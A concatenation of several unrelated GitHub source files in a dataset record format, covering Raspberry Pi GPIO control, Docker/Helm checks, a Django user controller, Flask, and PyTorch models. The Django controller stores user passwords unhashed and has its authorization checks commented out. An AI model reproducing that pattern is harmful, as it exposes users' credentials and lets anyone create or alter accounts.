100Hz\n \n try:\n pwm.start(duty_cycle)\n print(f\"Started PWM on pin {pin} with 100Hz frequency and {duty_cycle}% duty cycle.\")\n print(f\"It will run for {duration} seconds or you can press Ctrl+C to exit early.\")\n time.sleep(duration)\n except KeyboardInterrupt:\n print(\"\\nExiting early due to user interrupt.\")\n finally:\n pwm.stop()\n print(f\"Stopped PWM on pin {pin}.\")\n\ndef main():\n try:\n while True:\n print(\"\\nMenu:\")\n print(\"1. Digital Output\")\n print(\"2. PWM Output\")\n print(\"3. Exit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == \"1\":\n print(\"\\nDigital Output Options:\")\n print(\"1. Sample water (Pin 23)\")\n print(\"2. Washing pump (Pin 21)\")\n print(\"3. Mixing pump (Pin 16)\")\n print(\"4. Valve (Pin 20)\")\n \n digital_choice = input(\"Enter your choice: \")\n if digital_choice == \"1\":\n pin = 23\n elif digital_choice == \"2\":\n pin = 21\n elif digital_choice == \"3\":\n pin = 16\n elif digital_choice == \"4\":\n pin = 20\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duration = float(input(\"Enter duration in seconds: \"))\n digital_for_duration(pin, duration)\n \n elif choice == \"2\":\n print(\"\\nPWM Output Options:\")\n print(\"1. LED (Pin 12, max 40%)\")\n print(\"2. Dosing pump (Pin 13, max 40%)\")\n \n pwm_choice = input(\"Enter your choice: \")\n if pwm_choice == \"1\":\n pin = 12\n elif pwm_choice == \"2\":\n pin = 13\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duty_cycle = float(input(\"Enter duty cycle (0-40): \"))\n if duty_cycle > 40:\n print(\"Duty cycle exceeds maximum limit. Setting to 40%.\")\n duty_cycle = 40\n\n duration = float(input(\"Enter duration in seconds: \"))\n pwm_for_duration(pin, duty_cycle, duration)\n \n elif choice == \"3\":\n print(\"Exiting program.\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\n except KeyboardInterrupt:\n print(\"\\nProgram interrupted by user. Exiting.\")\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"timothymoniaga/raspi-ph","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10068552328","text":"import os\nimport re\nimport sys\nfrom packaging import version\nfrom subprocess import Popen, PIPE\nfrom poco.services.file_utils import FileUtils\nfrom poco.services.state import StateHolder\nfrom .console_logger import ColorPrint\nfrom datetime import *\n\n\nclass EnvironmentUtils:\n\n @staticmethod\n def get_variable(key, default=None):\n return os.environ.get(key, default)\n\n @staticmethod\n def set_variable(key, value):\n os.environ[key] = value\n\n @staticmethod\n def set_poco_uid_and_gid():\n if os.name == \"posix\":\n EnvironmentUtils.set_variable(\"POCO_UID\", str(os.getuid()))\n EnvironmentUtils.set_variable(\"POCO_GID\", str(os.getgid()))\n\n @staticmethod\n def check_docker():\n p = Popen(\"docker version -f {{.Server.Version}}\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message='Docker not running.')\n if str(out).split(\".\")[0] < str(17):\n ColorPrint.exit_after_print_messages(message='Please upgrade Docker to version 17 or above')\n\n @staticmethod\n def check_kubernetes():\n EnvironmentUtils.check_base(command=\"kubectl version --short\", message_head=\"Kubernetes\")\n\n @staticmethod\n def check_helm():\n EnvironmentUtils.check_base(command=\"helm version -s --short\", message_head=\"Helm\")\n\n @staticmethod\n def check_base(command, message_head):\n p = Popen(command, stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message=str(err).strip())\n ColorPrint.print_with_lvl(message=message_head + \"\\n \" + str(out).strip(), lvl=1)\n\n @staticmethod\n def check_version(current_version, is_beta_tester, is_force_check):\n if (EnvironmentUtils.need_check() or is_force_check):\n # check pip\n p = Popen(\"pip install poco==\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0:\n newest_version = EnvironmentUtils.parse_version(str(err), is_beta_tester)\n else:\n # maybe installed from source\n return\n if version.parse(current_version) < version.parse(newest_version):\n ColorPrint.print_warning(\"New version of poco is available. \\n \"\n \"Please upgrade with: pip install poco==\" + newest_version)\n elif is_force_check:\n ColorPrint.print_warning(\"Poco is up to date\")\n\n @staticmethod\n def parse_version(pip_content, is_beta_tester):\n \"\"\"PIP response variations and expected versions:\n * '(from versions: 0.0.1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1.dev1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1,0.0.2.dev1)' - noDev: 0.0.1 isDev: 0.0.2.dev1\n\n not dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\n is dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\n \"\"\"\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\"\n if is_beta_tester:\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\"\n matches = re.findall(version_expression, pip_content)\n\n pre_ver = matches[0] if len(matches) > 0 else \"0.0.0\"\n return pre_ver[0] if type(pre_ver) is tuple else pre_ver\n\n @staticmethod\n def decode(text_string):\n if sys.version_info[0] == 3:\n return text_string.decode(\"utf-8\")\n return text_string\n\n @staticmethod\n def need_check():\n directory = StateHolder.home_dir\n filename = \"latest_update_check_date\"\n latest_check_date = FileUtils.get_file_content(directory, filename)\n today = str(date.today())\n if (latest_check_date < today):\n FileUtils.write_to_file(directory, filename, today)\n return True\n return False\n","repo_name":"shiwaforce/poco","sub_path":"poco/services/environment_utils.py","file_name":"environment_utils.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"} +{"seq_id":"16157232832","text":"from django.contrib.auth.models import User\nfrom ..serializers import UsuarioSerializer\nfrom ..models import Puesto, Usuario, Rol, EstatusUsuario, Idioma\n\nclass ControllerUsuario:\n def crearUsuario(request):\n datosUsuario = request.data\n print(request.data)\n print(request)\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username)\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n \n UsuarioNuevo = Usuario.objects.create(\n username =username,\n p_nombre = datosUsuario['p_nombre'],\n p_apellido = datosUsuario['p_apellido'],\n s_apellido= datosUsuario['s_apellido'],\n email= datosUsuario['email'],\n telefono = datosUsuario['telefono'], \n password = datosUsuario['password'],\n es_activo = datosUsuario['es_activo'],\n rol = rol,\n puesto = puesto,\n idioma = idioma,\n estatus = estatus,\n )\n\n userNuevo = User.objects.create(\n username = username,\n email = datosUsuario['email'],\n password = datosUsuario['password'],\n )\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return {\"estatus\":\"Ok\", 'nuevo_usuario': UsuarioNuevo.username}\n \n def listarUsuario(id_usuario=None):\n if id_usuario:\n try:\n queryset = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n queryset = Usuario.objects.all()\n serializer = UsuarioSerializer(queryset, many=True)\n return serializer.data\n\n def verPerfil(p_nombre=None):\n if p_nombre:\n try:\n queryset = Usuario.objects.get(p_nombre=p_nombre)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n return ({'result': 'Ingrese el nombre de usuario'})\n\n\n def modificarUsuario(request,id_usuario=None):\n if id_usuario:\n datosUsuario = request.data\n try:\n usuarioModificar = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username).exclude(id_usuario=id_usuario)\n\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n usuarioModificar.username = username\n usuarioModificar.p_nombre = datosUsuario['p_nombre']\n usuarioModificar.p_apellido = datosUsuario['p_apellido']\n usuarioModificar.s_apellido= datosUsuario['s_apellido']\n usuarioModificar.email= datosUsuario['email']\n usuarioModificar.telefono = datosUsuario['telefono'] \n usuarioModificar.password = datosUsuario['password']\n usuarioModificar.es_activo = datosUsuario['es_activo']\n usuarioModificar.rol = rol\n usuarioModificar.puesto = puesto\n usuarioModificar.idioma = idioma\n usuarioModificar.estatus = estatus\n \n usuarioModificar.save()\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return {\"estatus\":\"Ok\", 'Usuario_modificado': usuarioModificar.username}\n else: \n return {\"result\":\"Ingrese el Id del usuario que desea modificar\"}","repo_name":"raquelnany/ACTIVO_DJANGO_DOCKER_PROGRES","sub_path":"app/core/controller/ControllerUsuario.py","file_name":"ControllerUsuario.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21785016887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 29/06/18\n\n@author: HarryS\n\"\"\"\n\nfrom scanning_functions import *\n\n\ndef run_scan(param_dict, args):\n \"\"\"\n Given points defined in param_dict run create run point directories\n and populate with Herwig .in file and params.dat file.\n\n Parameters\n ----------\n\n param_dict: dict\n Dictionary with parameter names as keys each containing another\n dictionary with keys 'range' and 'values'.\n\n args: argparse.Namespace object\n Argparse object with attributes containing command line options.\n\n Returns\n -------\n\n None\n\n \"\"\"\n\n # Read in run card template files\n template = read_template_file(args.template_file)\n\n make_directory(args.out_dir)\n for run_point in range(args.num_points):\n # Run point directories are inside the output directory and hold\n # the necessary files to run Herwig with the param_dict associated\n # with that point\n run_point_path = make_run_point_directory(run_point, args.out_dir)\n\n # Write params.dat file inside run point directory. This is purely to\n # record what the param_dict are at this run point\n write_param_file(param_dict, run_point_path, run_point)\n\n # Write run card template files formatted with parameter values\n write_template_files(template, param_dict, run_point,\n run_point_path, args.param_file)\n\n # Write all sampled points and their run points to a .dat file\n write_sampled_points(args.out_dir)\n","repo_name":"hsaunders1904/contur","sub_path":"AnalysisTools/contur/contur/Scanning/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8444128579","text":"\"\"\"\"\nCode is modified based on : https://github.com/lxtGH/PFSegNets\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Nets.SGFANet.mynn import Norm2d\nfrom Nets.ground_transformer import GroundTrans\n\n\ndef point_sample(input, point_coords, **kwargs):\n \"\"\"\n A wrapper around :function:`torch.nn.functional.grid_sample` to support 3D point_coords tensors.\n Unlike :function:`torch.nn.functional.grid_sample` it assumes `point_coords` to lie inside\n [0, 1] x [0, 1] square.\n\n Args:\n input (Tensor): A tensor of shape (N, C, H, W) that contains features map on a H x W grid.\n point_coords (Tensor): A tensor of shape (N, P, 2) or (N, Hgrid, Wgrid, 2) that contains\n [0, 1] x [0, 1] normalized point coordinates.\n\n Returns:\n output (Tensor): A tensor of shape (N, C, P) or (N, C, Hgrid, Wgrid) that contains\n features for points in `point_coords`. The features are obtained via bilinear\n interplation from `input` the same way as :function:`torch.nn.functional.grid_sample`.\n \"\"\"\n add_dim = False\n if point_coords.dim() == 3:\n add_dim = True\n point_coords = point_coords.unsqueeze(2)\n output = F.grid_sample(input, 2.0 * point_coords - 1.0, **kwargs)\n if add_dim:\n output = output.squeeze(3)\n return output\n\n\ndef get_uncertain_point_coords_on_grid(uncertainty_map, num_points):\n \"\"\"\n Find `num_points` most uncertain points from `uncertainty_map` grid.\n\n Args:\n uncertainty_map (Tensor): A tensor of shape (N, 1, H, W) that contains uncertainty\n values for a set of points on a regular H x W grid.\n num_points (int): The number of points P to select.\n\n Returns:\n point_indices (Tensor): A tensor of shape (N, P) that contains indices from\n [0, H x W) of the most uncertain points.\n point_coords (Tensor): A tensor of shape (N, P, 2) that contains [0, 1] x [0, 1] normalized\n coordinates of the most uncertain points from the H x W grid.\n \"\"\"\n R, _, H, W = uncertainty_map.shape\n h_step = 1.0 / float(H)\n w_step = 1.0 / float(W)\n\n num_points = min(H * W, num_points)\n point_indices = torch.topk(uncertainty_map.view(R, H * W), k=num_points, dim=1)[1]\n point_coords = torch.zeros(R, num_points, 2, dtype=torch.float, device=uncertainty_map.device)\n point_coords[:, :, 0] = w_step / 2.0 + (point_indices % W).to(torch.float) * w_step\n point_coords[:, :, 1] = h_step / 2.0 + (point_indices // W).to(torch.float) * h_step\n return point_indices, point_coords\n\n\nclass PointFlowModuleWithCornerEdgeSampling(nn.Module):\n def __init__(self, in_planes, dim=64, matcher_kernel_size=3,\n edge_points=32, corner_points=32, gated=False, gt_tag=True):\n super(PointFlowModuleWithCornerEdgeSampling, self).__init__()\n self.dim = dim\n self.down_h = nn.Conv2d(in_planes, dim, 1)\n self.down_l = nn.Conv2d(in_planes, dim, 1)\n self.softmax = nn.Softmax(dim=-1)\n self.edge_points = edge_points\n self.corner_points = corner_points\n self.gated = gated\n self.gt_tag = gt_tag\n if self.gt_tag:\n self.gt = GroundTrans(in_channels=in_planes, dimension=2)\n print(\"Ground Transformer\")\n print(f\"edge points:{self.edge_points},corner points:{self.corner_points}\")\n if self.gated:\n print(\"weight gate is added\")\n self.channel_gate = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, in_planes), nn.Sigmoid())\n self.feature_inportance = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, 1), nn.Sigmoid())\n self.edge_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=3, padding=1, bias=False)\n )\n self.corner_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=1, bias=False)\n )\n\n def forward(self, x):\n\n x_high, x_low = x # 8,8 16,16\n\n stride_ratio = x_low.shape[2] / x_high.shape[2]\n N, C, H, W = x_low.shape\n N_h, C_h, H_h, W_h = x_high.shape\n\n # edge part\n x_high_edge = x_high\n edge_pred = self.edge_final(x_high_edge)\n point_indices, point_coords = get_uncertain_point_coords_on_grid(edge_pred,\n num_points=self.edge_points) # torch.Size([2, K, 2])\n sample_x = point_indices % W_h * stride_ratio\n sample_y = point_indices // W_h * stride_ratio\n low_edge_indices = sample_x + sample_y * W\n low_edge_indices = low_edge_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_edge_feat = point_sample(x_high, point_coords) # torch.Size([2, 256, K])\n low_edge_feat = point_sample(x_low, point_coords)\n if self.gated:\n high_edge_feat = self.channel_gate(high_edge_feat.permute(0, 2, 1)) * high_edge_feat.permute(0, 2, 1)\n high_edge_feat = high_edge_feat.permute(0, 2, 1)\n low_edge_feat = self.channel_gate(low_edge_feat.permute(0, 2, 1)) * low_edge_feat.permute(0, 2, 1)\n low_edge_feat = low_edge_feat.permute(0, 2, 1)\n affinity_edge = torch.bmm(high_edge_feat.transpose(2, 1), low_edge_feat).transpose(2, 1)\n affinity = self.softmax(affinity_edge)\n high_edge_feat = torch.bmm(affinity, high_edge_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i = self.feature_inportance(high_edge_feat.permute(0, 2, 1))\n f_i = f_i.permute(0, 2, 1)\n fusion_edge_feat = f_i * high_edge_feat + (1 - f_i) * low_edge_feat\n else:\n fusion_edge_feat = high_edge_feat + low_edge_feat\n\n # corner part\n x_high_corner = x_high\n corner_pred = self.corner_final(x_high_corner)\n corner_point_indices, corner_point_coords = get_uncertain_point_coords_on_grid(corner_pred,\n num_points=self.corner_points)\n corner_sample_x = corner_point_indices % W_h * stride_ratio\n corner_sample_y = corner_point_indices // W_h * stride_ratio\n low_corner_indices = corner_sample_x + corner_sample_y * W\n low_corner_indices = low_corner_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_corner_feat = point_sample(x_high, corner_point_coords)\n low_corner_feat = point_sample(x_low, corner_point_coords)\n if self.gated:\n high_corner_feat = self.channel_gate(high_corner_feat.permute(0, 2, 1)) * high_corner_feat.permute(0, 2, 1)\n high_corner_feat = high_corner_feat.permute(0, 2, 1)\n low_corner_feat = self.channel_gate(low_corner_feat.permute(0, 2, 1)) * low_corner_feat.permute(0, 2, 1)\n low_corner_feat = low_corner_feat.permute(0, 2, 1)\n affinity_corner = torch.bmm(high_corner_feat.transpose(2, 1), low_corner_feat).transpose(2, 1)\n affinity_corner = self.softmax(affinity_corner)\n high_corner_feat = torch.bmm(affinity_corner, high_corner_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i_c = self.feature_inportance(high_corner_feat.permute(0, 2, 1))\n f_i_c = f_i_c.permute(0, 2, 1)\n fusion_corner_feat = f_i_c * high_corner_feat + (1 - f_i_c) * low_corner_feat\n else:\n fusion_corner_feat = high_corner_feat + low_corner_feat\n\n # GT Part\n if self.gt_tag == True:\n x_low = self.gt(x_low, x_high)\n\n final_features = x_low.reshape(N, C, H * W).scatter(2, low_edge_indices, fusion_edge_feat) # edge\n final_features = final_features.scatter(2, low_corner_indices, fusion_corner_feat) # corner\n final_features = final_features.view(N, C, H, W) #\n return final_features, edge_pred, corner_pred\n # end\n","repo_name":"zpl99/SGFANet","sub_path":"Nets/SGFANet/point_flow.py","file_name":"point_flow.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70914035610","text":"#!/usr/bin/python3\n\"\"\"Flask web application\nMust be listening on 0.0.0.0, port 5000\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n \"\"\"Displays list of all State on HTML page\n \"\"\"\n states = storage.all(\"State\")\n return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef states_id(id):\n \"\"\"Displays a State with a given id on HTML page\"\"\"\n for state in storage.all(\"State\").values():\n if state.id == id:\n return render_template(\"9-states.html\", state=state)\n return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n \"\"\"Remove current SQLAlchemy session\"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","repo_name":"mesihg/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15698421047","text":"from models.select_channels import ChannelSelection\nimport torch.nn as nn\nimport torch\nimport math\n\n\n# [conv1in, conv1out=conv2in, conv2out=conv3in] (conv3out=planes*expansion)\n# cfg the channels after bn\ndefaultcfg = [[16, 16, 16], [64, 16, 16]*(18-1), [64, 32, 32], [128, 32, 32]*(18-1), [128, 64, 64],\n [256, 64, 64]*(18-1), [256]]\n\n__all__ = ['resnet164']\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, cfg, stride):\n super(Bottleneck, self).__init__()\n self.expansion = Bottleneck.expansion\n\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.select = ChannelSelection(inplanes)\n self.conv1 = nn.Conv2d(cfg[0], cfg[1], kernel_size=1, stride=1, bias=False)\n\n self.bn2 = nn.BatchNorm2d(cfg[1])\n self.conv2 = nn.Conv2d(cfg[1], cfg[2], kernel_size=3, stride=stride, padding=1, bias=False)\n\n self.bn3 = nn.BatchNorm2d(cfg[2])\n self.conv3 = nn.Conv2d(cfg[2], planes * self.expansion, kernel_size=1, stride=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = nn.Identity()\n if stride != 1 or inplanes != planes * self.expansion:\n self.downsample = nn.Conv2d(inplanes, planes * self.expansion, kernel_size=1, stride=stride, bias=False)\n\n def forward(self, x):\n residual = self.downsample(x)\n\n out = self.bn1(x)\n out = self.select(out)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_class, cfg=None):\n super(ResNet, self).__init__()\n self.inplanes = 16\n if cfg is None:\n cfg = [item for sublist in defaultcfg for item in sublist]\n\n self.conv1 = nn.Conv2d(3, 16, 3, 1, 1, bias=False)\n self.stage1 = self.make_layers(Bottleneck, 16, 18, cfg[0: 18 * 3], 1)\n self.stage2 = self.make_layers(Bottleneck, 32, 18, cfg[18 * 3: 2 * 18 * 3], 2)\n self.stage3 = self.make_layers(Bottleneck, 64, 18, cfg[2 * 18 * 3: 3 * 18 * 3], 2)\n self.bn = nn.BatchNorm2d(64 * Bottleneck.expansion)\n self.select = ChannelSelection(64 * Bottleneck.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(cfg[-1], num_class)\n self._init_weights()\n\n def make_layers(self, Block, planes, blocks, cfg, stride):\n layers = []\n layers += [Block(self.inplanes, planes, cfg[0: 3], stride)]\n self.inplanes = planes * Block.expansion\n for i in range(1, blocks):\n layers += [Block(self.inplanes, planes, cfg[i * 3: i * 3 + 3], 1)]\n\n return nn.Sequential(*layers)\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(0.5)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.bias.data.zero_()\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.stage1(out)\n out = self.stage2(out)\n out = self.stage3(out)\n\n out = self.bn(out)\n out = self.select(out)\n out = self.relu(out)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out\n\n\ndef resnet164(cfg=None, num_class=100):\n return ResNet(num_class, cfg)\n\n\n# net = resnet164()\n# x = torch.rand(1, 3, 32, 32)\n# y = net(x)\n# print(y.shape)\n# for m in net.stage1[0].modules():\n# print(m)\n# print(net.stage1[0])\n\n","repo_name":"EstherBear/implementation-of-network-slimming","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"31517805329","text":"\"\"\"Time of Arrival Analysis.\"\"\"\n\nimport logging\nimport random\nimport warnings\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nfrom numba import jit\nfrom numba.core.errors import NumbaPendingDeprecationWarning\nfrom tqdm import tqdm\n\nLOG_FORMAT: str = \"[%(asctime)s] %(levelname)s \"\nLOG_FORMAT += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nLOG_FORMAT += \"%(message)s\"\nlogging.basicConfig(format=LOG_FORMAT, level=logging.ERROR)\nlog = logging.getLogger(__name__)\n# Supress deprecation messages\nwarnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=NumbaPendingDeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=UserWarning)\n\nFACTORIAL_LOOKUP_TABLE = np.array(\n [\n 1,\n 1,\n 2,\n 6,\n 24,\n 120,\n 720,\n 5040,\n 40320,\n 362880,\n 3628800,\n 39916800,\n 479001600,\n 6227020800,\n 87178291200,\n 1307674368000,\n 20922789888000,\n 355687428096000,\n 6402373705728000,\n 121645100408832000,\n 2432902008176640000,\n ],\n dtype=\"int64\",\n)\n\n\ndef frequency_grid(\n resolution: float = 0.00786432,\n samples: float = 536.0,\n oversample: int = 5,\n) -> np.ndarray:\n \"\"\"\n Generate frequency grid.\n\n Parameters\n ----------\n resolution : float, optional\n [description], by default 0.00786432\n samples : float, optional\n [description], by default 536.0\n oversample : int, optional\n [description], by default 5\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n spacing = 1.0 / (samples * resolution)\n nyquist = 0.5 * (1.0 / resolution)\n return np.arange(\n spacing,\n nyquist + (spacing / oversample),\n (spacing / oversample),\n )\n\n\n@jit(nopython=True)\ndef parameters(\n arrivals: List[float],\n chi: float,\n simulations: int = int(1e6),\n):\n \"\"\"\n Calculate the parameters for the workload .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int, optional\n [description], by default int(1e6)\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n # Convert\n toas = np.array(arrivals) * 0.001\n # np.empty is ~100x faster than np.zeros\n errors = np.zeros(len(toas)) * 0.001\n differences = np.zeros(len(toas) - 1)\n\n for index in np.arange(0, len(toas) - 1, 1):\n differences[index] = toas[index + 1] - toas[index]\n\n minimum = chi * differences.mean()\n maximum = (2.0 - chi) * differences.mean()\n return toas, errors, differences, minimum, maximum\n\n\n@jit(nopython=True)\ndef z2search(toas: np.ndarray, errors: np.ndarray, grid: np.ndarray) -> np.ndarray:\n \"\"\"\n Lightcurve search.\n\n Parameters\n ----------\n toas : np.ndarray\n [description]\n errors : np.ndarray\n [description]\n grid : np.ndarray\n [description]\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n z1 = np.zeros(grid.size, dtype=np.float64)\n for index in np.arange(0, len(grid), 1):\n phase = pulse_phase(toas, grid[index])\n z1[index] = z_n(phase, n=1)\n return z1\n\n\n@jit(nopython=True)\ndef pulse_phase(times, *frequency_derivatives):\n \"\"\"\n Calculate pulse phase from the frequency and its derivatives.\n\n Parameters\n ----------\n times : array of floats\n The times at which the phase is calculated\n *frequency_derivatives: floats\n List of derivatives in increasing order, starting from zero.\n\n Returns\n -------\n phases : array of floats\n The absolute pulse phase\n \"\"\"\n phase = np.zeros(len(times))\n for i_f, f in enumerate(frequency_derivatives):\n factorial = fast_factorial(i_f + 1)\n phase += 1 / factorial * times ** (i_f + 1) * f\n phase -= np.floor(phase)\n return phase\n\n\n@jit(nopython=True)\ndef fast_factorial(value: np.int64) -> np.int64:\n \"\"\"\n Factorial.\n\n Parameters\n ----------\n value : np.int64\n Some integer value.\n\n Returns\n -------\n np.int64\n\n Raises\n ------\n ValueError\n When value > 20.\n \"\"\"\n if value > 20:\n raise ValueError(\"fast_factorial for n>20, not supported.\")\n return FACTORIAL_LOOKUP_TABLE[value]\n\n\n@jit(nopython=True)\ndef z_n(phase: np.ndarray, n: int = 2, norm: float = 1.0):\n \"\"\"Z^2_n statistics, a` la Buccheri+03, A&A, 128, 245, eq. 2.\n\n Parameters\n ----------\n phase : array of floats\n The phases of the events\n n : int, default 2\n Number of harmonics, including the fundamental\n norm : float or array of floats\n A normalization factor that gets multiplied as a weight.\n\n Returns\n -------\n z2_n : float\n The Z^2_n statistics of the events.\n \"\"\"\n nbin = len(phase)\n if nbin == 0:\n return 0\n normalization = np.array(norm)\n if normalization.size == 1:\n total_norm = nbin * normalization\n else:\n total_norm = np.sum(normalization)\n phase = phase * 2 * np.pi\n return 2.0 / total_norm * statistic(n, phase, normalization)\n\n\n@jit(nopython=True)\ndef statistic(n, phase, norm):\n \"\"\"Calculate Z^2 Statistic.\"\"\"\n stat = np.zeros(n + 1, dtype=np.float64)\n for k in range(1, n + 1):\n stat[k - 1] = (\n np.sum(np.cos(k * phase) * norm) ** 2\n 